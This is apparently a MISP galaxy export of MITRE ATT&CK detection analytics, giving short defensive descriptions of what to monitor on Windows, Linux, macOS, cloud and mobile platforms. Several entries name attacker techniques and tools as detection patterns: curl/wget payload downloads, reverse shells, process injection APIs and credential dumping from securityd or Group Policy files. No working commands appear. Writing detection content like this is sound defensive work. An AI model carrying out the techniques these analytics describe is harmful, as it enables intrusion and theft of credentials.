Analytic 0941 - AN0941

Detects the use of message-based injection by monitoring for sequences involving FindWindow (EnumWindows or EnumChildWindows), VirtualAllocEx or related API calls, combined with suspicious PostMessage/SendMessage (e.g., LVM_SETITEMPOSITION) use to SysListView32 controls, followed by LVM_SORTITEMS invocation instead of WriteProcessMemory.

Internal MISP references

UUID 217128c5-144d-492b-ab72-bd0704348221 which can be used as unique global reference for Analytic 0941 - AN0941 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0941
mitre_platforms ['Windows']

Analytic 0149 - AN0149

Abnormal Apple Mail use, including internal email relays followed by file execution or script events (e.g., attachments launched via Preview, terminal triggered from Mail.app)

Internal MISP references

UUID 3533fba3-e80d-4ad0-be45-62460b28ad7c which can be used as unique global reference for Analytic 0149 - AN0149 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0149
mitre_platforms ['macOS']

Analytic 1490 - AN1490

Unusual long-running processes consuming high CPU cycles (e.g., via 'top' or 'ps') initiated via cron, shell scripts, or Docker. Connections to known mining pools or DNS over HTTPS usage as evasion.

Internal MISP references

UUID 45a34d76-16aa-45ac-9419-ffbc5d2e090d which can be used as unique global reference for Analytic 1490 - AN1490 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1490
mitre_platforms ['Linux']

Analytic 0419 - AN0419

Forged SAML tokens in IaaS environments often manifest as cross-cloud or cross-account authentication without matching STS events. Defenders may see AssumeRole or GetFederationToken API usage without a corresponding SAML assertion log from the trusted IdP.

Internal MISP references

UUID 5c6e9102-b3ef-4eaa-85c1-bb5702df0f45 which can be used as unique global reference for Analytic 0419 - AN0419 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0419
mitre_platforms ['IaaS']

Analytic 0194 - AN0194

Detects file transfers or mounting operations from remote hosts followed by write actions into a local staging directory, often using SMB or remote shell activity.

Internal MISP references

UUID 7efd6a7b-d7c0-4922-a1df-c492c0a2d3f8 which can be used as unique global reference for Analytic 0194 - AN0194 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0194
mitre_platforms ['Windows']

Analytic 1049 - AN1049

Shell scripts or binaries invoking repeated 'sleep', 'ping', or low-level syscalls (e.g., nanosleep) in short-lived execution chains with no user or system interaction. Frequently seen in malicious cron jobs or payload stagers.

Internal MISP references

UUID dcc422d4-90fc-4e2a-afd5-b4fbc3d6c4a1 which can be used as unique global reference for Analytic 1049 - AN1049 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1049
mitre_platforms ['Linux']

Analytic 0914 - AN0914

Detects ELF binaries written to disk that demonstrate anomalous file size or entropy, quickly followed by execution or memory region writes into remote processes (e.g., using ptrace).

Internal MISP references

UUID f606ec01-15d2-4432-b91b-669411205015 which can be used as unique global reference for Analytic 0914 - AN0914 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0914
mitre_platforms ['Linux']

Analytic 1409 - AN1409

Detects SVGs downloaded via browser that invoke AppleScript, osascript, or JavaScriptCore processes, followed by network egress or file drop to LaunchAgents or ~/Library.

Internal MISP references

UUID fe1cff12-9772-4ba9-92bc-c26eae79da24 which can be used as unique global reference for Analytic 1409 - AN1409 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1409
mitre_platforms ['macOS']

Analytic 0155 - AN0155

Detection of malicious certificate installation via monitoring execution of the security add-trusted-cert command and modifications to system keychains.

Internal MISP references

UUID 477fb167-a388-4e85-856b-bdcb36e7fd95 which can be used as unique global reference for Analytic 0155 - AN0155 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0155
mitre_platforms ['macOS']

Analytic 0515 - AN0515

Use of native/mac tools (sharing -l, smbutil view, mount_smbfs) or scripts to enumerate SMB shares across many hosts, followed by outbound SMB connections observed in PF/Zeek logs.

Internal MISP references

UUID 5a9238a9-acd0-44f0-bd41-f86ef433775b which can be used as unique global reference for Analytic 0515 - AN0515 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0515
mitre_platforms ['macOS']

Analytic 1550 - AN1550

Adversary adds IDE extensions or plugins (VS Code, JetBrains Toolbox/EAP, Eclipse) via GUI or CLI, possibly via managed profiles. Chain: process start with install/update flags → plist/extension folder changes under ~/Library/Application Support/Code or ~/Library/Application Support/JetBrains → outbound connections to marketplaces/tunnel services → optional helper (ssh/node) spawned.

Internal MISP references

UUID 77d3146f-2066-40a9-872e-ec05d7a4d6d1 which can be used as unique global reference for Analytic 1550 - AN1550 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1550
mitre_platforms ['macOS']

Analytic 1055 - AN1055

Track creation or update of SaaS automation scripts (e.g., Google Workspace Apps Script). Detect when these scripts are bound to user events such as file opens or account modifications, and correlate with subsequent abnormal API calls that exfiltrate or modify user data.

Internal MISP references

UUID 8708dc0b-8eeb-4a3d-8770-2fab30f46682 which can be used as unique global reference for Analytic 1055 - AN1055 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1055
mitre_platforms ['SaaS']

Analytic 0551 - AN0551

Suspicious creation or modification of inbox rules through PowerShell (New-InboxRule, Set-InboxRule) to automatically delete, move, or hide emails. Defender perspective: unusual rule activity correlated with mailbox access and filtering patterns.

Internal MISP references

UUID a09ed72b-be04-475f-8c0a-11ed47b40bd1 which can be used as unique global reference for Analytic 0551 - AN0551 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0551
mitre_platforms ['Windows']

Analytic 1505 - AN1505

Detects unexpected access or usage of cloud productivity tools (e.g., downloading large numbers of files, creating external shares) by internal users.

Internal MISP references

UUID ac36f883-9a5b-4796-9f2e-18f1cce8fc0b which can be used as unique global reference for Analytic 1505 - AN1505 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1505
mitre_platforms ['SaaS']

Analytic 1065 - AN1065

Detects use of gzip, base64, tar, or openssl in scripts or commands that encode/encrypt files after file staging or system enumeration.

Internal MISP references

UUID 3e7ff1f9-57e2-44f4-8dc1-20d1a1652f73 which can be used as unique global reference for Analytic 1065 - AN1065 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1065
mitre_platforms ['Linux']

Analytic 1560 - AN1560

Processes executing binaries named after legitimate system utilities (e.g., net.exe, findstr.exe, python.exe) from non-standard or application-specific directories, combined with file creation or modification events for such binaries. Defender correlates file writes in vulnerable directories, process execution paths inconsistent with baseline system paths, and abnormal parent-child relationships in process lineage.

Internal MISP references

UUID 578c821c-f8e3-45e7-a9b4-9aed6c84309a which can be used as unique global reference for Analytic 1560 - AN1560 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1560
mitre_platforms ['Windows']

Analytic 1506 - AN1506

Detects login and usage patterns deviating from typical Microsoft 365 or Google Workspace user profiles.

Internal MISP references

UUID 5f1ffd26-01f7-47fc-b544-130fc14c0bd2 which can be used as unique global reference for Analytic 1506 - AN1506 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1506
mitre_platforms ['Office Suite']

Analytic 0561 - AN0561

Execution of ifconfig, networksetup, or system_profiler to query IP/MAC/interface configuration and status.

Internal MISP references

UUID 79c196d7-abb8-4766-a875-4acafc6f059d which can be used as unique global reference for Analytic 0561 - AN0561 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0561
mitre_platforms ['macOS']

Analytic 0156 - AN0156

Detects suspicious memory access attempts targeting the securityd process. Observes tools invoking process memory read operations (e.g., ptrace, task_for_pid) against securityd. Correlates with anomalous parent process lineage, root privilege escalation, or repeated unauthorized attempts.

Internal MISP references

UUID 94628b16-2443-4e66-9f7b-a61a39012a9c which can be used as unique global reference for Analytic 0156 - AN0156 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0156
mitre_platforms ['macOS']

Analytic 1605 - AN1605

Adversary invokes 'useradd', 'adduser', or equivalent system commands or scripts to create local users. Detection focuses on command execution and audit trail of passwd/shadow file modifications.

Internal MISP references

UUID 9d70d90c-f318-4318-a18d-e4775ffa229e which can be used as unique global reference for Analytic 1605 - AN1605 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1605
mitre_platforms ['Linux']

Analytic 0615 - AN0615

Detection of ESXi escape attempts by monitoring for anomalies in hypervisor logs such as unexpected VM operations, privilege escalation events, or attempts to load malicious kernel modules within the hypervisor environment.

Internal MISP references

UUID 9f5f193f-6aef-4586-a047-492b0c651001 which can be used as unique global reference for Analytic 0615 - AN0615 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0615
mitre_platforms ['ESXi']

Analytic 1056 - AN1056

Monitor for creation or modification of udev rules files in key directories (/etc/udev/rules.d/, /lib/udev/rules.d/, /usr/lib/udev/rules.d/). Look for RUN+= or IMPORT keys invoking suspicious binaries or scripts. Correlate this with process execution from systemd-udevd context, and file writes near udev reload/restart events. Combine this with unexpected background process spawning from udevd-related forks.

Internal MISP references

UUID c1167779-9df4-4387-b777-4da097c6b033 which can be used as unique global reference for Analytic 1056 - AN1056 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1056
mitre_platforms ['Linux']

Analytic 0516 - AN0516

Correlate suspicious file transfers over SMB or Admin$ shares with process creation events (e.g., cmd.exe, powershell.exe, certutil.exe) that do not align with normal administrative behavior. Detect remote file writes followed by execution of transferred binaries.

Internal MISP references

UUID ce0f284b-f8d9-4cb0-84ad-97e1e8390d0c which can be used as unique global reference for Analytic 0516 - AN0516 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0516
mitre_platforms ['Windows']

Analytic 0651 - AN0651

Detect the creation or modification of common media file formats (e.g., .jpg, .png, .wav) following suspicious process activity like compression or encryption, especially when paired with lateral movement or exfiltration behavior.

Internal MISP references

UUID e7be37f1-88f9-45e3-91d0-1ff37bc94892 which can be used as unique global reference for Analytic 0651 - AN0651 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0651
mitre_platforms ['Windows']

Analytic 0165 - AN0165

Unusual or uncommon processes initiate network connections to external destinations followed by file creation (tools downloaded).

Internal MISP references

UUID f20d9241-84cc-4393-b2fb-798241da73fa which can be used as unique global reference for Analytic 0165 - AN0165 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0165
mitre_platforms ['Windows']

Analytic 1650 - AN1650

Application vetting services could look for android.permission.READ_CALL_LOG in an Android application’s manifest. Most applications do not need call log access, so extra scrutiny could be applied to those that request it. On Android, the user can manage which applications have permission to access the call log through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID 9ed67778-6277-4e12-aa3e-29f39a81e67a which can be used as unique global reference for Analytic 1650 - AN1650 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1650
mitre_platforms ['Android']

Analytic 0517 - AN0517

Monitor scp, rsync, curl, sftp, or ftp processes initiating transfers to internal systems combined with file creation events in unusual directories. Correlate transfer activity with subsequent execution of those binaries.

Internal MISP references

UUID 24af9441-602e-4202-a2e7-04a46c008406 which can be used as unique global reference for Analytic 0517 - AN0517 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0517
mitre_platforms ['Linux']

Analytic 0571 - AN0571

Detection correlates anomalous Docker or Kubernetes API requests with access to logs, secrets, or service accounts. Observes unauthorized use of docker logs, kubectl get secrets, or direct API calls to Kubernetes API server endpoints. Identifies behavioral patterns where adversaries escalate from basic pod/container interaction to privileged API calls exposing sensitive credential material.

Internal MISP references

UUID 2d054232-8968-4d11-b742-536b70bbb1ba which can be used as unique global reference for Analytic 0571 - AN0571 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0571
mitre_platforms ['Containers']

Analytic 1570 - AN1570

Defenders may observe adversary attempts to downgrade system images by monitoring for anomalous file transfers of OS image files (via TFTP, FTP, SCP), configuration changes pointing boot system variables to older image files, unexpected OS version strings after reboot, and checksum mismatches against approved baseline images. Suspicious chains include transfer of an older image, alteration of boot configuration, and reboot/reload of the device. Adversaries may also tamper with CLI output to disguise downgrade attempts, requiring independent validation of OS version and integrity.

Internal MISP references

UUID 370daadc-e640-4487-8ba0-c897f46459bc which can be used as unique global reference for Analytic 1570 - AN1570 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1570
mitre_platforms ['Network Devices']

Analytic 0715 - AN0715

Execution of known or custom VNC/remote desktop daemons or tunneling agents that initiate external communication after launch

Internal MISP references

UUID 77769a6d-f3f4-42f1-a9a7-0d1096563115 which can be used as unique global reference for Analytic 0715 - AN0715 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0715
mitre_platforms ['Linux']

Analytic 1057 - AN1057

Detects processes performing network enumeration (e.g., port scans, service probing) by correlating process creation, socket connections, and sequential destination IP probing within a time window.

Internal MISP references

UUID 84299e85-2a7e-4f78-9767-3d29aa58857a which can be used as unique global reference for Analytic 1057 - AN1057 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1057
mitre_platforms ['Windows']

Analytic 0157 - AN0157

Detects adversaries attempting to attach debuggers or memory dump utilities to credential storage daemons analogous to macOS securityd. Observes ptrace syscalls, /proc//mem access, or gcore dumps against sensitive processes. Correlates anomalies with privilege escalation or credential dumping attempts.

Internal MISP references

UUID 9e0af3ac-dfeb-48c3-8d15-5f9edd69be69 which can be used as unique global reference for Analytic 0157 - AN0157 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0157
mitre_platforms ['Linux']

Analytic 0751 - AN0751

SSH session from new source IP followed by interactive shell or privilege escalation (e.g., sudo, su) and outbound lateral connection.

Internal MISP references

UUID a366262a-ba79-4b74-be16-0b139d546651 which can be used as unique global reference for Analytic 0751 - AN0751 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0751
mitre_platforms ['Linux']

Analytic 0175 - AN0175

Detects Python script or interpreter execution on ESXi hosts via embedded BusyBox shells, nested installations, or dropped files via SSH or datastore mount. Flags unusual scripting or post-compromise enumeration behavior.

Internal MISP references

UUID aff39b79-72c6-4cf9-8ddf-1332252580d5 which can be used as unique global reference for Analytic 0175 - AN0175 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0175
mitre_platforms ['ESXi']

Analytic 1075 - AN1075

Correlates file enumeration of XML files in the SYSVOL share with suspicious process execution that decodes or reads encrypted credentials embedded in Group Policy Preference files (e.g., Get-GPPPassword.ps1, gpprefdecrypt.py, Metasploit). Detects abnormal access to \DOMAIN\SYSVOL combined with XML file parsing or decryption logic.

Internal MISP references

UUID e14e67af-6f6e-47d6-aa19-4012ea99284c which can be used as unique global reference for Analytic 1075 - AN1075 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1075
mitre_platforms ['Windows']

Analytic 1507 - AN1507

Installation of malicious IIS/Apache/SQL server modules that later execute command-line interpreters or establish outbound connections.

Internal MISP references

UUID ea250997-091b-4c5e-8827-a41f03e34caf which can be used as unique global reference for Analytic 1507 - AN1507 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1507
mitre_platforms ['Windows']

Analytic 1705 - AN1705

Application vetting services may be able to detect known privilege escalation exploits contained within applications, as well as searching application packages for strings that correlate to known password store locations. Mobile security products can potentially detect jailbroken devices.

Internal MISP references

UUID 1a27d3ed-86e8-4389-927d-1d43d94dc719 which can be used as unique global reference for Analytic 1705 - AN1705 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1705
mitre_platforms ['iOS']

Analytic 1750 - AN1750

Application vetting services could look for use of standard APIs (e.g. the clipboard API) that could indicate data manipulation is occurring.

Internal MISP references

UUID 332065d4-9895-485b-8674-756f4d3fab7c which can be used as unique global reference for Analytic 1750 - AN1750 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1750
mitre_platforms ['Android']

Analytic 1085 - AN1085

A process outside of interactive shell context reads ~/.bash_history directly (e.g., using cat, less, grep), often shortly after privilege escalation or user switch (su/sudo). This may be followed by credential scanning in memory or file writes to new locations.

Internal MISP references

UUID 12be6c5f-213a-464f-b780-ac06f20ab763 which can be used as unique global reference for Analytic 1085 - AN1085 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1085
mitre_platforms ['Linux']

Analytic 1058 - AN1058

Detects use of network scanning utilities or scripts performing rapid connections to multiple services or hosts using auditd and netflow/pcap telemetry.

Internal MISP references

UUID 287661d0-714e-4bb4-a9f7-c272ad0018b1 which can be used as unique global reference for Analytic 1058 - AN1058 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1058
mitre_platforms ['Linux']

Analytic 0851 - AN0851

User or remote input triggers application crash or segmentation fault (e.g., SIGSEGV) with service recovery attempts, observed via audit logs and systemd journaling.

Internal MISP references

UUID 2f4d199c-4d62-4d7d-8c6e-3ec358c22e76 which can be used as unique global reference for Analytic 0851 - AN0851 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0851
mitre_platforms ['Linux']

Analytic 0518 - AN0518

Detect anomalous use of scp, rsync, curl, or third-party sync apps transferring executables into user directories. Correlate new file creation with immediate execution events.

Internal MISP references

UUID 34d6af16-fe37-458c-b15c-413ff2d5b2f7 which can be used as unique global reference for Analytic 0518 - AN0518 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0518
mitre_platforms ['macOS']

Analytic 1580 - AN1580

Detects snapshot sharing, backup exports, or data object transfers from victim-owned cloud accounts to other cloud identities within the same provider (e.g., AWS, Azure) using snapshot sharing, S3 bucket policy updates, or SAS URI generation.

Internal MISP references

UUID 383dda28-1d76-4605-a53d-07829f3d7ef8 which can be used as unique global reference for Analytic 1580 - AN1580 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1580
mitre_platforms ['IaaS']

Analytic 0158 - AN0158

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID 55ec66de-8146-4fd0-a423-0954d6ba33ef which can be used as unique global reference for Analytic 0158 - AN0158 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0158
mitre_platforms ['Windows']

Analytic 0185 - AN0185

Chain: (1) a new external device is recognized by Windows (USB/Thunderbolt/PCIe) or a new block device appears; (2) within a short window, the same user/session spawns processes or the OS mounts a new volume; (3) optional follow-on activity such as HID keystroke injection, DMA driver load, or new network interface MAC on DHCP. Correlate Security EID 6416 / Kernel-PnP with sysmon and DHCP/network metadata.

Internal MISP references

UUID 61d89912-f74e-4fde-ae7a-591e8c7c5739 which can be used as unique global reference for Analytic 0185 - AN0185 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0185
mitre_platforms ['Windows']

Analytic 1508 - AN1508

Abuse of extensible server modules (e.g., Apache, Nginx, Tomcat) to load rogue plugins that initiate bash, connect to C2, or spawn reverse shells.

Internal MISP references

UUID 65f89c21-d42a-4028-9865-122ea1079a77 which can be used as unique global reference for Analytic 1508 - AN1508 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1508
mitre_platforms ['Linux']

Analytic 0815 - AN0815

Detects registration of new PTA agents, conditional access changes disabling hybrid MFA enforcement, or suspicious updates to AD FS token-signing configurations.

Internal MISP references

UUID e1063b92-9be0-4d25-9df5-bae4171c8153 which can be used as unique global reference for Analytic 0815 - AN0815 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0815
mitre_platforms ['Identity Provider']

Analytic 0581 - AN0581

Execution of XSL scripts via msxsl.exe or wmic.exe using embedded JScript or VBScript for proxy execution. Detection correlates process creation, command-line patterns, and module load behavior of scripting components (e.g., jscript.dll).

Internal MISP references

UUID f313053f-5898-4f47-b263-a60098f5c963 which can be used as unique global reference for Analytic 0581 - AN0581 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0581
mitre_platforms ['Windows']

Analytic 1805 - AN1805

Mobile security products can typically detect rooted devices, which is an indication that Process Discovery is possible. Application vetting could potentially detect when applications attempt to abuse root access or root the system itself. Further, application vetting services could look for attempted usage of legacy process discovery mechanisms, such as the usage of ps or inspection of the /proc directory.

Internal MISP references

UUID 5d07c07e-4cde-41b9-a03e-94be43ca9bb8 which can be used as unique global reference for Analytic 1805 - AN1805 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1805
mitre_platforms ['iOS']

Analytic 1850 - AN1850

Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID dd1b3351-f8e5-480e-9e7d-f9cfbbf01409 which can be used as unique global reference for Analytic 1850 - AN1850 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1850
mitre_platforms ['Android']

Analytic 0195 - AN0195

Detects inbound SCP, rsync, or NFS mounts from remote systems followed by aggregation of files into known staging paths like /mnt/staging or /var/tmp.

Internal MISP references

UUID 14ac0f26-e5db-42da-b730-9e115027f8e9 which can be used as unique global reference for Analytic 0195 - AN0195 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0195
mitre_platforms ['Linux']

Analytic 1059 - AN1059

Detects Bonjour-based mDNS enumeration or use of system tools (e.g., dns-sd, nmap) to find active services via multicast probing or targeted scans.

Internal MISP references

UUID 28fbe1b0-9663-4997-9d4e-ef43803be114 which can be used as unique global reference for Analytic 1059 - AN1059 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1059
mitre_platforms ['macOS']

Analytic 0591 - AN0591

Use of domain accounts via sssd or winbind for logon activity outside of typical patterns, especially on sensitive systems or with lateral movement tools.

Internal MISP references

UUID 74aade7b-b61a-46d0-a68b-33fba4f09f6e which can be used as unique global reference for Analytic 0591 - AN0591 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0591
mitre_platforms ['Linux']

Analytic 1950 - AN1950

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 8722b13a-1b20-4f2e-991b-153a26bba2a8 which can be used as unique global reference for Analytic 1950 - AN1950 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1950
mitre_platforms ['PRE']

Analytic 0951 - AN0951

Monitors binary modification in /Applications and system library paths. Detects unsigned or improperly signed binaries executed after modification. Tracks Gatekeeper or notarization bypass attempts tied to modified binaries.

Internal MISP references

UUID 88eaf8ce-b48d-4329-a147-dd5d065cead2 which can be used as unique global reference for Analytic 0951 - AN0951 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0951
mitre_platforms ['macOS']

Analytic 1095 - AN1095

Detects DLL injection through correlation of memory allocation and writing to remote process memory (e.g., VirtualAllocEx, WriteProcessMemory), followed by remote thread creation (e.g., CreateRemoteThread) that loads a suspicious or unsigned DLL using LoadLibrary or reflective loading.

Internal MISP references

UUID a06e9154-5584-4f5d-be47-b420d79674c7 which can be used as unique global reference for Analytic 1095 - AN1095 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1095
mitre_platforms ['Windows']

Analytic 1590 - AN1590

Creation or modification of Apple Mail rules by accessing plist files or GUI automation (AppleScript).

Internal MISP references

UUID c93edcb2-385a-4472-a9db-ace5371250eb which can be used as unique global reference for Analytic 1590 - AN1590 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1590
mitre_platforms ['macOS']

Analytic 1509 - AN1509

Malicious use of webserver plugins (e.g., for nginx, PHP, Node.js) that execute AppleScript or open network sockets.

Internal MISP references

UUID d5af4c93-632c-41c3-a101-6e9e534d7d01 which can be used as unique global reference for Analytic 1509 - AN1509 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1509
mitre_platforms ['macOS']

Analytic 0159 - AN0159

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID dc4096a9-b89d-4bef-b20d-58cf5e87f6bf which can be used as unique global reference for Analytic 0159 - AN0159 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0159
mitre_platforms ['Linux']

Analytic 0519 - AN0519

Identify lateral transfer via datastore file uploads or internal scp/ssh sessions that result in new VMX/VMDK or script files. Correlate transfer with VM execution or datastore modification.

Internal MISP references

UUID f8857048-181f-4883-a50b-65aca5204228 which can be used as unique global reference for Analytic 0519 - AN0519 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0519
mitre_platforms ['ESXi']

Analytic 0915 - AN0915

Identifies Mach-O binaries dropped into temporary directories with abnormally high binary size or padding patterns, followed by privilege escalation, exec, or memory mapping of other processes.

Internal MISP references

UUID fcc2b0dc-93c4-49de-abfe-6273c24d1d89 which can be used as unique global reference for Analytic 0915 - AN0915 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0915
mitre_platforms ['macOS']

Analytic 1066 - AN1066

Monitors use of archive or encryption tools (zip, openssl) tied to user-scripted activity or binaries writing encoded payloads under /Users or /Volumes.

Internal MISP references

UUID 1c2e527f-b9ff-4e1d-896d-0c1257f0abc1 which can be used as unique global reference for Analytic 1066 - AN1066 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1066
mitre_platforms ['macOS']

Analytic 0166 - AN0166

Shell-based tools (curl, wget, scp) initiate connections to external domains followed by creation of executable files on disk.

Internal MISP references

UUID 62d55c57-54a3-4c6f-8d0d-2684fa26c347 which can be used as unique global reference for Analytic 0166 - AN0166 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0166
mitre_platforms ['Linux']

Analytic 0616 - AN0616

Detects USB device insertion followed by high-volume or sensitive file access and staging activity by suspicious processes or accounts.

Internal MISP references

UUID 67ff7cc5-7b9b-4d15-b115-b55c3d164c64 which can be used as unique global reference for Analytic 0616 - AN0616 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0616
mitre_platforms ['Windows']

Analytic 0661 - AN0661

Detection of modified boot-time configuration scripts that persist malicious CLI commands across reboots.

Internal MISP references

UUID b053dbd4-ad1e-45e1-a6b7-af2a5d931c82 which can be used as unique global reference for Analytic 0661 - AN0661 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0661
mitre_platforms ['Network Devices']

Analytic 1606 - AN1606

Adversary creates new users using 'dscl' commands, GUI tools, or by modifying user plist files. Detection includes monitoring dscl invocation and user-related plist changes.

Internal MISP references

UUID ddaf8ed8-f6bd-4eac-911c-d9fd243e87e9 which can be used as unique global reference for Analytic 1606 - AN1606 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1606
mitre_platforms ['macOS']

Analytic 1660 - AN1660

On Android, the user can review which applications can use premium SMS features in the "Special access" page within application settings. Application vetting services can detect when applications request the SEND_SMS permission, which should be infrequently used.

Internal MISP references

UUID ccb42e9d-557f-4dc5-b313-75fb6b212821 which can be used as unique global reference for Analytic 1660 - AN1660 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1660
mitre_platforms ['iOS']

Analytic 0716 - AN0716

Initiation of remote desktop sessions via AnyDesk, TeamViewer, or Chrome Remote Desktop accompanied by unexpected user logins or system modifications

Internal MISP references

UUID 1d46bf4d-a090-4865-9205-e271d223da42 which can be used as unique global reference for Analytic 0716 - AN0716 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0716
mitre_platforms ['macOS']

Analytic 0167 - AN0167

Process execution of curl or wget followed by a network connection and a file created in temporary or user-specific directories.

Internal MISP references

UUID 56552a3e-9934-4809-97a4-67d62f29478c which can be used as unique global reference for Analytic 0167 - AN0167 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0167
mitre_platforms ['macOS']

Analytic 1607 - AN1607

Adversary creates users via IAM/IdP API or portal (e.g., Azure AD, Okta). Detection involves monitoring API calls, admin action logs, and correlation with role assignments.

Internal MISP references

UUID 7947aae5-fd76-403c-8c73-1300dff7d30f which can be used as unique global reference for Analytic 1607 - AN1607 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1607
mitre_platforms ['Identity Provider']

Analytic 0761 - AN0761

Applications or launchd jobs initiating encrypted TLS traffic to rare external hosts. Defender observes unified logs showing ssl/TLS API calls by processes not baseline-approved, and payload entropy suggesting encrypted C2 sessions.

Internal MISP references

UUID 80c5c2fd-eb3a-4678-9d3b-6147a90284de which can be used as unique global reference for Analytic 0761 - AN0761 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0761
mitre_platforms ['macOS']

Analytic 1067 - AN1067

Identifies transfer of base64, uuencoded, or high-entropy files over HTTP, FTP, or custom protocols in lateral movement or exfiltration streams.

Internal MISP references

